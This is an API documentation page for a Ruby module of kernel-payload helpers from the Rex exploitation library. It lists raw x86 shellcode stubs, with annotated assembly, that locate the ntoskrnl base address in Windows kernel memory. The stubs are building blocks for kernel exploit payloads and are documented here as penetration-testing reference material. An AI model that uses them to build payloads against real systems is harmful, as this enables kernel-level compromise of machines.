Module: Rex::Payloads::Win32::Kernel::Common
- Defined in:
- lib/rex/payloads/win32/kernel/common.rb
Overview
This module provides common methods that may be shared across more than one kernel-mode payload. Each find_nt_* method returns a short 32-bit x86 machine-code stub (a binary string) that leaves the base address of ntoskrnl in eax; the stubs target the x86 kernel layout (KPCR at 0xffdff000, or reachable through fs) and are not usable as-is on x64. Many of these are from the following paper:
Class Method Summary
- .find_nt_idt_eeye ⇒ Object
  Returns a stub that will find the base address of ntoskrnl and place it in eax.
- .find_nt_kdversionblock ⇒ Object
  Returns a stub that will find the base address of ntoskrnl and place it in eax.
- .find_nt_pcr ⇒ Object
  Returns a stub that will find the base address of ntoskrnl and place it in eax.
- .resolve_call_sym ⇒ Object
  Delegates to Rex::Payloads::Win32::Common.resolve_call_sym.
Class Method Details
.find_nt_idt_eeye ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax. The stub reads the IDT base out of the KPCR (0xffdff038), takes the high word of the handler address from the first IDT entry (the low word of eax is left holding the gate attributes), and then decrements eax one byte at a time until the dword at eax is the "MZ\x90\x00" DOS header. Credit to eEye.
# File 'lib/rex/payloads/win32/kernel/common.rb', line 22
def self.find_nt_idt_eeye
  # mov esi, [0xffdff038] (KPCR.IDT) ; lodsd ; lodsd  -> eax = IDT[0] offset_high | attrs
  # loop: dec eax ; cmp dword [eax], 0x00905a4d ("MZ\x90\x00") ; jne loop
  "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
end
.find_nt_kdversionblock ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax. The stub loads KPCR.KdVersionBlock from fs:[0x34] and returns the KernBase field at offset 0x10 of that structure; no memory search is involved.
# File 'lib/rex/payloads/win32/kernel/common.rb', line 30
def self.find_nt_kdversionblock
  # xor eax, eax ; mov eax, fs:[eax+0x34] (KPCR.KdVersionBlock) ; mov eax, [eax+0x10] (KernBase)
  "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
end
.find_nt_pcr ⇒ Object
Returns a stub that will find the base address of ntoskrnl and place it in eax. The stub starts from the pointer at 0xffdff12c in the processor control region (KPRCB.IdleThread, which points into ntoskrnl's own data), aligns it down to a page boundary and walks backwards one page at a time until the word at eax is "MZ".
# File 'lib/rex/payloads/win32/kernel/common.rb', line 39
def self.find_nt_pcr
  # mov eax, [0xffdff12c] (KPRCB.IdleThread)
  # loop: and ax, 0xf001 ; dec eax ; cmp word [eax], 0x5a4d ("MZ") ; jne loop
  "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
end
.resolve_call_sym ⇒ Object
Delegates to Rex::Payloads::Win32::Common.resolve_call_sym, so kernel payloads resolve symbols with the same helper as the user-mode Win32 payloads.
# File 'lib/rex/payloads/win32/kernel/common.rb', line 46
def self.resolve_call_sym
  Rex::Payloads::Win32::Common.resolve_call_sym
end